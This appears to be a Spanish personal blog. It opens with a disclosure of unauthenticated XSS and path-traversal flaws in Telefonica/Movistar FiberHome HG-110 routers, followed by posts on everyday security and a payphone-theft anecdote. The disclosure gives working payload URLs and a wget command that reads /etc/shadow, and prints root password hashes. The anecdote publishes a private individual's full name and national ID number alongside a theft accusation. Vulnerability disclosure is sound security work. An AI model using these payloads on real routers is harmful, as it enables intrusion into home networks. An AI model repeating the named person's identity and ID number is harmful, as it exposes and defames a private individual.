Etiquetatelefonica

Vulnerabilidad en todos los routers Fiberhome HG-110 de Telefonica/Movistar

En algunos paises, Telefonica/Movistar entrega a sus clientes un router FiberHome HG-110, uno blanco y con dos antenitas:

Las vulnerabilidades que he encontrado son:

Cross-Site Scripting: https://router.internal.ip:port/cgi-bin/webproc?getpage=%3Cscript%3Ealert%28this%29%3C/script%3E&var:menu=advanced&var:page=dns

Local File Include and Directory/Path Traversal: https://router.internal.ip:port/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/passwd&var:menu=advanced&var:page=dns

Para poder explotar estas vulnerabilidades no es necesario estar autenticado.

Informacion del dispositivo:

HardwareVersion :	HG110_BH_R1A
SoftwareVersion :	HG110_BH_V1.6
Firmware Version :	1.0.0

No descarto que estas mismas (y otras) vulnerabilidades puedan afectar a otros modelos del mismo fabricante.

ACTUIALIZADO El httpd se ejecuta como “root” (mini_httpd) por lo que es posible acceder, mediante LFI, a archivos con esos privilegios.

$ wget -o /dev/null -O – “https://192.168.1.1:8000/cgi-bin
/webproc?getpage=../../../../../../../../../../../../etc/shadow&
var:menu=advanced&var:page=dns”

#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::

root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::

#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

~ $ ps ax|grep httpd

509 root 4212 SW /usr/sbin/mini_httpd -d /usr/www -c
/cgi-bin/* -u roo

~ $

Seguridad cotidiana: cajeros automáticos, tarjetas de crédito, teléfonos públicos, etc

Con seguridad cotidiana me refiero a la seguridad de lo que vivímos en el día a día, cuando usamos un teléfono público, cuando vamos a un cajero automático a sacar dinero o bien cuando hacemos una compra con tarjeta de crédito.
Yo he sido víctima de la falta de seguridad en éstos 3 casos, si bien nunca me han robado dinero ni clonado mi tarjeta, si me he sentido inseguro utilizando alguno de los servicios. No hablaré solamente del fallo de seguridad de las empresas, tambien de la poca seguridad que tienen los mismos usuarios

seguridad cotidiana: cajeros automaticos, tarjeta de credito, telefono publico

Tanto las empresas como los usuarios (clientes) no tienen las suficientes medidas de seguridad al utilizar uno de éstos servicios, muchas veces los usuarios no denuncian una anomalía, por lo que para las empresas es difícil dar solución a algo de lo que no tienen conocimiento. Por otro lado, las empresas, cuando un usuario les denuncia algun problema, no son capaces de dar solución.

Seguir leyendo

Robo en los teléfonos públicos de Telefónica

El día Jueves 4 de Diciembbre del 2008 estaba en la estación de metro “Plaza de Armas”, me iba a juntar con un amigo y tenia que llamarlo, sólo tenia cien pesos ($100 CLP), lo que me alcanzaba justo para llamarle al celular y hablar 20 segundos con él. Me acerqué a uno de esos teléfonos públicos, metí la moneda de cien pesos y cuando iba a marcar el número, el teléfono me había comido la moneda, le heché un par de puteadas le di un par de golpes a ver si soltaba la moneda pero no pasó nada, colgué la caga de teléfono y me fui, indignado. Empece a dar vueltas y a esperar a que mi amigo me llame para ponernos de acuerdo y entre tantas vueltas que me di por la estación y luego de haber visto a mucha gente que intentaba llamar por esos teléfonos y le pasa lo mismo, veo a un flaite que estaba abriendo los teléfonos, luego le daba un golpe a la ranura donde se ponen las monedas y todas las monedas que el teléfono se había tragado el tipo se las estaba hechando en su bolsillo … Me dio rabia y lo primero que hice fue ir donde un guardia -tambien con cara de flaite-:

Yo Hola, mira sabes, hay un tipo que está abriendo los teléfonos públicos y se está llenando los bolsillos con …
aca el guardia me interrumpe y dice
Guardia: ah .. no, si el es técnico de telefónica.
Yo: Em … Ya.

No le creí y no me quedé tranquilo asi que fui a hablar con otro guardia (uno que tenia menos cara de flaite) y me dice “Mira ahí está la jefa de estación”, entonces ok, fui a hablar con la jefa de estación y le conté la situación y lo primero que hizo fue correr detrás del tipo para pillarlo y ver que estaba pasando. La jefa de estació le pidio la credencial a este tipo, para verificar si realmente era técnico de telefonica y efectivamente, el tipo teina una credencial (se notaba que era media trucha) asi que nada se pudo hacer pero de todas formas le tomé los datos al tipo para más tarde llamar a telefonica para ver que estaba pasando, si era normal ese procedimiento, si es normal que un tecnico vaya a revisar los telefonos sin un uniforme que los identifique, etc.

Más tarde llamé a telefonica y le conté lo que había ocurrido, detalladamente, le di los datos del tipo, etc y lo primero que me dice la operadora fue:

Operadora: Usted tuvo que haberle pedido las monedas a esa persona
Yo: Claaro … una persona con una cara de delincuente (flaite), sin uniforme .. seguro me da confianza para ir a pedirle las monedas po’
Operadora: Ah bueno.. si lo entiendo. Ya, yo hablaré con mi supervisor y le contaré lo ocurrido.
Yo: Y no puedo hablar yo con él?
Operadora: No .. es que el no está ahora.
Yo: Em ya … entonces, que solución me da? Que hago con las monedas que perdí?
Operadora: Pues mala suerte, las monedas las perdio nomás
Yo: …. PLOP

Le corté y hasta ahora no he tenido respuesta. El flaite se llama Christofer Farias Valenzuela y su R.U.T es 17.545.494-2.